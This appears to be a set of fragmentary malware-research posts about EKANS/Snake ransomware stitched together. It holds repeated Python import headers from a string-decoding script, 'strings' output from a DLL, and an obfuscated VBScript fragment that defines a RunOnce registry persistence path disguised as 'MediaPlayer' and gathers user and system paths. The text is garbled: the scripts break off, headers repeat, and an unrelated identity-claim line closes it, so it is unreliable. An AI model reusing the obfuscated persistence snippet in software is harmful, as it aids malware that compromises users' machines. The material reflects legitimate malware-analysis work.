Tweaked script:
import re
import sys
import pefile
import struct
import binascii
$ strings -e l faxprint.dll
GGMM
exit
%s%s\
Kernel32.dll
May 9 2020
%d*%d
%dd%dh%dm%ds
T:%dM,A:%dM
~MHz
Strings decoded from the newer version of #EKANS ransomware.
import re
import sys
import pefile
import struct
import binascii
On Error Resume Next
Set bhBxz = WScript.CreateObject("WScript.Shell")
NgWJtK = "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\MediaPlayer"
Set VFUSKXwNgG = CreateObject("WScript.Shell")
Set ioBuA = CreateObject("Scripting.FileSystemObject")
ARtLeH = VFUSKXwNgG.ExpandEnvironmentStrings("%USERPROFILE%")
GOfuTtmrFM=VFUSKXwNgG.ExpandEnvironmentStrings("%COMPUTERNAME%")
tAqdq=VFUSKXwNgG.ExpandEnvironmentStrings("%SYSTEMDRIVE%")
IVcetC=VFUSKXwNgG.ExpandEnvironmentStrings("%APPDATA%")
Script and the decoded strings from the EKANS/Snake ransomware. Original script written by @sysopfb - I've only modified the regexp to cover all cases where decryption was used in the sample.
Script:
import re
import sys
import pefile
import struct
I hereby claim:
To claim this, I am signing this object: